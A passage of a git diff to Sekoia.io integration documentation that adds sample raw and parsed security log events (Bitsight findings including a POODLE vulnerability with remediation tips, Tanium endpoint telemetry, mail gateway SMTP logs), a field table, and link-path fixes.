"Diligence", + "risk_vector": "open_ports", + "risk_vector_label": "Open Ports", + "rolledup_observation_id": "1123123123123123123", + "severity": 1.0, + "severity_category": "minor", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": null, + "comments": null, + "remaining_decay": 57, + "remediated": null, + "impacts_risk_vector_details": "AFFECTS_RATING", + "company_uuid": "1111111111111111111111111", + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "low", + "importance": 0.0, + "is_ip": true, + "asset_type": "IP" + } + } + ``` + + + +=== "test_event_domain" + + + ```json + { + "temporary_id": "1111111111111111111111111111111111111111111111111111&", + "affects_rating": false, + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "low", + "importance": 0, + "is_ip": true, + "asset_type": "Domain" + }, + "vulnerability": { + "name": "CVE-2014-3566", + "alias": "POODLE", + "display_name": "POODLE", + "description": "The SSLv3 protocol, as used in OpenSSL through 1.0.1i and other products, makes it easier for Man-in-the-middle (MITM) attackers to obtain cleartext data via a padding-oracle attack (a.k.a. POODLE).", + "remediation_tip": "Ensure all of your TLS/SSL libraries on the affected machines are up-to-date. Disable SSLv3 support on those servers, as described in Disable SSLv3.", + "confidence": "HIGH", + "cvss": { + "base": 3.4 + }, + "severity": "Minor" + }, + "company_uuid": "399e55d6-eab2-438d-84cd-fb0d0b967fcd", + "details": { + "cvss": { + "base": [ + 3.4 + ] + }, + "check_pass": "", + "diligence_annotations": { + "remediation_dates": [ + { + "first": "2022-08-14 21:04:42", + "last": "2022-08-14 21:04:42" + } + ], + "is_remediated": true + }, + "remediations": [ + { + "message": "CVE-2014-3566 (POODLE)", + "help_text": "The SSLv3 protocol, as used in OpenSSL through 1.0.1i and other products, makes it easier for Man-in-the-middle (MITM) attackers to obtain cleartext data via a padding-oracle attack (a.k.a. POODLE).", + "remediation_tip": "Ensure all of your TLS/SSL libraries on the affected machines are up-to-date. Disable SSLv3 support on those servers, as described in Disable SSLv3." + } + ], + "rollup_end_date": "2022-08-14", + "rollup_start_date": "2022-08-14", + "searchable_details": "CVE-2014-3566" + }, + "evidence_key": "1.2.3.4:443", + "first_seen": "2022-08-14", + "last_seen": "2022-08-14", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "patching_cadence", + "risk_vector_label": "Patching Cadence", + "rolledup_observation_id": "ZxFoXXsV3gvZS0t0oTmxcA==", + "severity": 4.3, + "severity_category": "moderate", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": "1 day", + "comments": null, + "remaining_decay": null, + "remediated": true, + "impacts_risk_vector_details": "LIFETIME_EXPIRED" + } + ``` + + + +=== "test_event_ip" + + + ```json + { + "temporary_id": "1111111111111111111111111111111111111111111111111111&", + "affects_rating": false, + "asset": { + "asset": "1.2.3.4", + "identifier": null, + "category": "low", + "importance": 0, + "is_ip": true, + "asset_type": "IP" + }, + "vulnerability": { + "name": "CVE-2014-3566", + "alias": "POODLE", + "display_name": "POODLE", + "description": "The SSLv3 protocol, as used in OpenSSL through 1.0.1i and other products, makes it easier for Man-in-the-middle (MITM) attackers to obtain cleartext data via a padding-oracle attack (a.k.a. POODLE).", + "remediation_tip": "Ensure all of your TLS/SSL libraries on the affected machines are up-to-date. Disable SSLv3 support on those servers, as described in Disable SSLv3.", + "confidence": "HIGH", + "cvss": { + "base": 3.4 + }, + "severity": "Minor" + }, + "company_uuid": "399e55d6-eab2-438d-84cd-fb0d0b967fcd", + "details": { + "cvss": { + "base": [ + 3.4 + ] + }, + "check_pass": "", + "diligence_annotations": { + "remediation_dates": [ + { + "first": "2022-08-14 21:04:42", + "last": "2022-08-14 21:04:42" + } + ], + "is_remediated": true + }, + "remediations": [ + { + "message": "CVE-2014-3566 (POODLE)", + "help_text": "The SSLv3 protocol, as used in OpenSSL through 1.0.1i and other products, makes it easier for Man-in-the-middle (MITM) attackers to obtain cleartext data via a padding-oracle attack (a.k.a. POODLE).", + "remediation_tip": "Ensure all of your TLS/SSL libraries on the affected machines are up-to-date. Disable SSLv3 support on those servers, as described in Disable SSLv3." + } + ], + "rollup_end_date": "2022-08-14", + "rollup_start_date": "2022-08-14", + "searchable_details": "CVE-2014-3566" + }, + "evidence_key": "1.2.3.4:443", + "first_seen": "2022-08-14", + "last_seen": "2022-08-14", + "related_findings": [], + "risk_category": "Diligence", + "risk_vector": "patching_cadence", + "risk_vector_label": "Patching Cadence", + "rolledup_observation_id": "ZxFoXXsV3gvZS0t0oTmxcA==", + "severity": 4.3, + "severity_category": "moderate", + "tags": [], + "remediation_history": { + "last_requested_refresh_date": null, + "last_refresh_status_date": null, + "last_refresh_status_label": null, + "last_refresh_reason_code": null + }, + "asset_overrides": [], + "duration": "1 day", + "comments": null, + "remaining_decay": null, + "remediated": true, + "impacts_risk_vector_details": "LIFETIME_EXPIRED" + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/5803f97d-b324-4452-b861-0253b15de650.md b/_shared_content/operations_center/integrations/generated/5803f97d-b324-4452-b861-0253b15de650.md index ee9698208e..b8e1dc093f 100644 --- a/_shared_content/operations_center/integrations/generated/5803f97d-b324-4452-b861-0253b15de650.md +++ b/_shared_content/operations_center/integrations/generated/5803f97d-b324-4452-b861-0253b15de650.md @@ -28,7 +28,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event_01.json" diff --git a/_shared_content/operations_center/integrations/generated/588a448b-c08d-4139-a746-b2b9f366e34b.md b/_shared_content/operations_center/integrations/generated/588a448b-c08d-4139-a746-b2b9f366e34b.md index 7199d5bf48..7b953b1238 100644 --- a/_shared_content/operations_center/integrations/generated/588a448b-c08d-4139-a746-b2b9f366e34b.md +++ b/_shared_content/operations_center/integrations/generated/588a448b-c08d-4139-a746-b2b9f366e34b.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_access.json" diff --git a/_shared_content/operations_center/integrations/generated/591feb54-1d1f-4453-b780-b225c59e9f99.md b/_shared_content/operations_center/integrations/generated/591feb54-1d1f-4453-b780-b225c59e9f99.md index 83dff5cda9..acaa7e89b4 100644 --- a/_shared_content/operations_center/integrations/generated/591feb54-1d1f-4453-b780-b225c59e9f99.md +++ b/_shared_content/operations_center/integrations/generated/591feb54-1d1f-4453-b780-b225c59e9f99.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_arp_src_ip.json" diff --git a/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5.md b/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5.md index 3b657d60c1..f1855bfff0 100644 --- a/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5.md +++ b/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5.md @@ -26,10 +26,250 @@ The following table lists the data source offered by this integration. +In details, the following table denotes the type of events produced by this integration. +| Name | Values | +| ---- | ------ | +| Kind | `event` | +| Category | `file`, `network`, `process`, `registry` | +| Type | `allowed`, `change`, `creation`, `deletion`, `end`, `info`, `start` | +### Transformed Events Samples after Ingestion + +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. + +=== "tanium_file_open.json" + + ```json + + { + "message": "{\"event\":\"file_open\",\"hostname\":\"2256269043\",\"host\":\"172.16.2.1\",\"fields\":{\"tanium_process_id\":\"-6966335309415971179\",\"read_flag\":true,\"full_path\":\"/var/lib/rrdcached/db/pve2-vm/115\",\"process__login__user_id\":4294967295,\"process__login__user_name\":null,\"process__pid\":1685,\"process__user__group\":\"root\",\"process__file__full_path\":\"/usr/bin/rrdcached\",\"process__user__name\":\"root\"}}", + "event": { + "action": "file-open", + "category": [ + "file" + ], + "kind": "event", + "type": [ + "info" + ] + }, + "file": { + "directory": "/var/lib/rrdcached/db/pve2-vm", + "name": "115", + "path": "/var/lib/rrdcached/db/pve2-vm/115" + }, + "group": { + "name": "root" + }, + "host": { + "hostname": "2256269043", + "ip": [ + "172.16.2.1" + ], + "name": "2256269043" + }, + "observer": { + "name": "2256269043", + "product": "XEM", + "type": "sensor", + "vendor": "Tanium" + }, + "process": { + "executable": "/usr/bin/rrdcached", + "name": "rrdcached", + "pid": 1685 + }, + "related": { + "hosts": [ + "2256269043" + ], + "ip": [ + "172.16.2.1" + ] + }, + "user": { + "id": "4294967295" + } + } + + ``` + + +=== "tanium_network_connect.json" + + ```json + + { + "message": "{\"event\":\"network_connect\",\"hostname\":\"2421864415\",\"host\":\"172.16.2.1\",\"fields\":{\"remote_port\":80,\"process__login__user_name\":null,\"process__pid\":2540,\"process__user__group\":\"NT AUTHORITY\",\"local_ip\":\"172.16.4.1\",\"local_port\":53671,\"process__file__full_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"tanium_process_id\":\"-4314545011392247632\",\"process__login__user_id\":0,\"remote_ip\":\"184.25.50.65\",\"process__user__name\":\"NETWORK SERVICE\"}}", + "event": { + "category": [ + "network" + ], + "kind": "event", + "type": [ + "start" + ] + }, + "destination": { + "address": "184.25.50.65", + "ip": "184.25.50.65", + "port": 80 + }, + "group": { + "name": "NT AUTHORITY" + }, + "host": { + "hostname": "2421864415", + "ip": [ + "172.16.2.1" + ], + "name": "2421864415" + }, + "observer": { + "name": "2421864415", + "product": "XEM", + "type": "sensor", + "vendor": "Tanium" + }, + "process": { + "executable": "C:\\Windows\\System32\\svchost.exe", + "name": "svchost.exe", + "pid": 2540 + }, + "related": { + "hosts": [ + "2421864415" + ], + "ip": [ + "172.16.2.1", + "172.16.4.1", + "184.25.50.65" + ] + }, + "source": { + "address": "172.16.4.1", + "ip": "172.16.4.1", + "port": 53671 + }, + "user": { + "id": "0" + } + } + + ``` + + +=== "tanium_process_start.json" + + ```json + + { + "message": "{\"event\":\"process_start\",\"hostname\":\"1345671024\",\"host\":\"172.16.2.1\",\"fields\":{\"file__md5\":\"8ed54b7dcf043252441bca716b8c461f\",\"tanium_parent_process_id\":\"-6966498655612172786\",\"create_time\":\"2021-07-15T13:47:13.084000+00:00\",\"parent__command_line\":\"pve-firewall\",\"file__full_path\":\"/usr/sbin/ipset\",\"tanium_process_id\":\"-6166594163916654264\",\"pid\":14664,\"login__user_name\":null,\"command_line\":\"ipset save\",\"login__user_id\":4294967295,\"parent__file__full_path\":\"/usr/bin/perl\",\"user__name\":\"root\",\"parent_pid\":1550,\"user__group\":\"root\"}}", + "event": { + "category": [ + "process" + ], + "kind": "event", + "type": [ + "start" + ] + }, + "file": { + "directory": "/usr/sbin", + "name": "ipset", + "path": "/usr/sbin/ipset" + }, + "host": { + "hostname": "1345671024", + "ip": [ + "172.16.2.1" + ], + "name": "1345671024" + }, + "observer": { + "name": "1345671024", + "product": "XEM", + "type": "sensor", + "vendor": "Tanium" + }, + "process": { + "command_line": "ipset save", + "executable": "/usr/sbin/ipset", + "hash": { + "md5": "8ed54b7dcf043252441bca716b8c461f" + }, + "parent": { + "command_line": "pve-firewall", + "executable": "/usr/bin/perl", + "name": "perl", + "pid": 1550 + }, + "start": "2021-07-15T13:47:13.084000Z" + }, + "related": { + "hash": [ + "8ed54b7dcf043252441bca716b8c461f" + ], + "hosts": [ + "1345671024" + ], + "ip": [ + "172.16.2.1" + ] + } + } + + ``` + + + + + +### Extracted Fields + +The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. + +| Name | Type | Description | +| ---- | ---- | ---------------------------| +|`destination.ip` | `ip` | IP address of the destination. | +|`destination.port` | `long` | Port of the destination. | +|`dns.answers` | `object` | Array of DNS answers. | +|`dns.question.name` | `keyword` | The name being queried. | +|`event.action` | `keyword` | The action captured by the event. | +|`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | +|`event.kind` | `keyword` | The kind of the event. The highest categorization field in the hierarchy. | +|`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | +|`file.directory` | `keyword` | Directory where the file is located. | +|`file.name` | `keyword` | Name of the file including the extension, without the directory. | +|`file.path` | `keyword` | Full path to the file, including the file name. | +|`group.name` | `keyword` | Name of the group. | +|`host.hostname` | `keyword` | Hostname of the host. | +|`host.ip` | `ip` | Host ip addresses. | +|`observer.name` | `keyword` | Custom name of the observer. | +|`observer.product` | `keyword` | The product name of the observer. | +|`observer.type` | `keyword` | The type of the observer the data is coming from. | +|`observer.vendor` | `keyword` | Vendor name of the observer. | +|`process.command_line` | `wildcard` | Full command line that started the process. | +|`process.executable` | `keyword` | Absolute path to the process executable. | +|`process.hash.md5` | `keyword` | MD5 hash. | +|`process.name` | `keyword` | Process name. | +|`process.parent.command_line` | `wildcard` | Full command line that started the process. | +|`process.parent.executable` | `keyword` | Absolute path to the process executable. | +|`process.parent.name` | `keyword` | Process name. | +|`process.parent.pid` | `long` | Process id. | +|`process.pid` | `long` | Process id. | +|`process.start` | `date` | The time the process started. | +|`registry.path` | `keyword` | Full path, including hive, key and value | +|`registry.value` | `keyword` | Name of the value written. | +|`source.ip` | `ip` | IP address of the source. | +|`source.port` | `long` | Port of the source. | +|`user.id` | `keyword` | Unique identifier of the user. | +|`user.name` | `keyword` | Short name or login of the user. | + + For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Tanium/tanium). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5_sample.md b/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5_sample.md index e69de29bb2..c2f3608b63 100644 --- a/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5_sample.md +++ b/_shared_content/operations_center/integrations/generated/59991ced-c2a0-4fb0-91f3-49e3993c16f5_sample.md @@ -0,0 +1,85 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "tanium_file_open" + + + ```json + { + "event": "file_open", + "hostname": "2256269043", + "host": "172.16.2.1", + "fields": { + "tanium_process_id": "-6966335309415971179", + "read_flag": true, + "full_path": "/var/lib/rrdcached/db/pve2-vm/115", + "process__login__user_id": 4294967295, + "process__login__user_name": null, + "process__pid": 1685, + "process__user__group": "root", + "process__file__full_path": "/usr/bin/rrdcached", + "process__user__name": "root" + } + } + ``` + + + +=== "tanium_network_connect" + + + ```json + { + "event": "network_connect", + "hostname": "2421864415", + "host": "172.16.2.1", + "fields": { + "remote_port": 80, + "process__login__user_name": null, + "process__pid": 2540, + "process__user__group": "NT AUTHORITY", + "local_ip": "172.16.4.1", + "local_port": 53671, + "process__file__full_path": "C:\\Windows\\System32\\svchost.exe", + "tanium_process_id": "-4314545011392247632", + "process__login__user_id": 0, + "remote_ip": "184.25.50.65", + "process__user__name": "NETWORK SERVICE" + } + } + ``` + + + +=== "tanium_process_start" + + + ```json + { + "event": "process_start", + "hostname": "1345671024", + "host": "172.16.2.1", + "fields": { + "file__md5": "8ed54b7dcf043252441bca716b8c461f", + "tanium_parent_process_id": "-6966498655612172786", + "create_time": "2021-07-15T13:47:13.084000+00:00", + "parent__command_line": "pve-firewall", + "file__full_path": "/usr/sbin/ipset", + "tanium_process_id": "-6166594163916654264", + "pid": 14664, + "login__user_name": null, + "command_line": "ipset save", + "login__user_id": 4294967295, + "parent__file__full_path": "/usr/bin/perl", + "user__name": "root", + "parent_pid": 1550, + "user__group": "root" + } + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/5a8ef52f-d143-4735-8546-98539fc07725.md b/_shared_content/operations_center/integrations/generated/5a8ef52f-d143-4735-8546-98539fc07725.md index 5e5ef07d07..3b52e78f77 100644 --- a/_shared_content/operations_center/integrations/generated/5a8ef52f-d143-4735-8546-98539fc07725.md +++ b/_shared_content/operations_center/integrations/generated/5a8ef52f-d143-4735-8546-98539fc07725.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "1.json" diff --git a/_shared_content/operations_center/integrations/generated/5cf6cc3b-50ca-48f5-a3ea-b9be92914fa2.md b/_shared_content/operations_center/integrations/generated/5cf6cc3b-50ca-48f5-a3ea-b9be92914fa2.md index 783e69f709..0d95f50dcd 100644 --- a/_shared_content/operations_center/integrations/generated/5cf6cc3b-50ca-48f5-a3ea-b9be92914fa2.md +++ b/_shared_content/operations_center/integrations/generated/5cf6cc3b-50ca-48f5-a3ea-b9be92914fa2.md @@ -20,7 +20,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test-umbrella-ip.json" diff --git a/_shared_content/operations_center/integrations/generated/5d9e261a-944c-4a76-8c61-6794fd44d9a8.md b/_shared_content/operations_center/integrations/generated/5d9e261a-944c-4a76-8c61-6794fd44d9a8.md index c75a25bcdd..22eb0b2607 100644 --- a/_shared_content/operations_center/integrations/generated/5d9e261a-944c-4a76-8c61-6794fd44d9a8.md +++ b/_shared_content/operations_center/integrations/generated/5d9e261a-944c-4a76-8c61-6794fd44d9a8.md @@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "domain.json" diff --git a/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1.md b/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1.md index 4879d11155..c96f0b006f 100644 --- a/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1.md +++ b/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1.md @@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "encrypt.json" @@ -143,6 +143,127 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "event_smpt_to_1.json" + + ```json + + { + "message": "time=18:33:35.615 device_id=xcvfg log_id=0003007072 type=event subtype=smtp pri=information user=mail ui=mail action=NONE status=N/A session_id=\"13KGXMHI007058-13KGXMHK007058\" msg=\"to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay= [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)\"", + "event": { + "action": "NONE", + "category": "smtp", + "kind": "event", + "message": "to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay= [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)", + "reason": "Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)" + }, + "action": { + "outcome_reason": "to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay= [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)", + "properties": { + "delay": "00:00:06", + "device_id": "xcvfg", + "dsn_version": "2.0.0", + "log_id": "0003007072", + "mailer": "esmtp", + "priority_level_msg": "165917", + "session_id": "13KGXMHI007058-13KGXMHK007058", + "user_identifier": "mail", + "xdelay": "00:00:06" + } + }, + "destination": { + "address": "188.165.36.237", + "ip": "188.165.36.237" + }, + "email": { + "to": { + "address": [ + "contact@example.com" + ] + } + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "188.165.36.237" + ], + "user": [ + "mail" + ] + }, + "user": { + "email": "contact@example.com", + "name": "mail" + } + } + + ``` + + +=== "event_smpt_to_2.json" + + ```json + + { + "message": "time=18:33:35.615 device_id=xcvfg log_id=0003007072 type=event subtype=smtp pri=information user=mail ui=mail action=NONE status=N/A session_id=\"13KGXMHI007058-13KGXMHK007058\" msg=\"to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay=smtp.example.org [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)\"", + "event": { + "action": "NONE", + "category": "smtp", + "kind": "event", + "message": "to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay=smtp.example.org [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)", + "reason": "Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)" + }, + "action": { + "outcome_reason": "to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay=smtp.example.org [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)", + "properties": { + "delay": "00:00:06", + "device_id": "xcvfg", + "dsn_version": "2.0.0", + "log_id": "0003007072", + "mailer": "esmtp", + "priority_level_msg": "165917", + "session_id": "13KGXMHI007058-13KGXMHK007058", + "user_identifier": "mail", + "xdelay": "00:00:06" + } + }, + "destination": { + "address": "smtp.example.org", + "domain": "smtp.example.org", + "ip": "188.165.36.237", + "size_in_char": 16 + }, + "email": { + "to": { + "address": [ + "contact@example.com" + ] + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "smtp.example.org" + ], + "ip": [ + "188.165.36.237" + ], + "user": [ + "mail" + ] + }, + "user": { + "email": "contact@example.com", + "name": "mail" + } + } + + ``` + + === "event_smtp_STARTTLS.json" ```json @@ -224,6 +345,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": "1.1.1.1", "size_in_char": 9 }, + "email": { + "to": { + "address": [ + "mh.fr" + ] + } + }, "host": { "name": "1234" }, @@ -243,7 +371,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "user": { - "email": "", + "email": "mh.fr", "name": "mail" } } @@ -284,6 +412,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "ip": "1.1.1.1", "size_in_char": 8 }, + "email": { + "to": { + "address": [ + "sjira.eu" + ] + } + }, "host": { "name": "1234" }, @@ -303,7 +438,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "user": { - "email": "", + "email": "sjira.eu", "name": "mail" } } @@ -366,10 +501,17 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "level": "information" }, "related": { + "ip": [ + "1.2.3.4" + ], "user": [ "j.doe" ] }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, "user": { "name": "j.doe" } @@ -551,6 +693,13 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "user_identifier": "mail" } }, + "email": { + "to": { + "address": [ + "postmaster" + ] + } + }, "host": { "name": "00000" }, diff --git a/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1_sample.md b/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1_sample.md index c1e3b8a561..6acc839904 100644 --- a/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1_sample.md +++ b/_shared_content/operations_center/integrations/generated/60af2bd6-7ef0-48a7-a6db-90fcdd7236f1_sample.md @@ -28,6 +28,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "event_smpt_to_1" + + ``` + time=18:33:35.615 device_id=xcvfg log_id=0003007072 type=event subtype=smtp pri=information user=mail ui=mail action=NONE status=N/A session_id="13KGXMHI007058-13KGXMHK007058" msg="to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay= [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)" + ``` + + + +=== "event_smpt_to_2" + + ``` + time=18:33:35.615 device_id=xcvfg log_id=0003007072 type=event subtype=smtp pri=information user=mail ui=mail action=NONE status=N/A session_id="13KGXMHI007058-13KGXMHK007058" msg="to=, delay=00:00:06, xdelay=00:00:06, mailer=esmtp, pri=165917, relay=smtp.example.org [188.165.36.237], dsn=2.0.0, stat=Sent (Ok: queued as 4T9pxY2qZtz2XPBPX)" + ``` + + + === "event_smtp_STARTTLS" ``` diff --git a/_shared_content/operations_center/integrations/generated/622999fe-d383-4d41-9f2d-eed5013fe463.md b/_shared_content/operations_center/integrations/generated/622999fe-d383-4d41-9f2d-eed5013fe463.md index a9cc69dfff..c703ec1d49 100644 --- a/_shared_content/operations_center/integrations/generated/622999fe-d383-4d41-9f2d-eed5013fe463.md +++ b/_shared_content/operations_center/integrations/generated/622999fe-d383-4d41-9f2d-eed5013fe463.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage 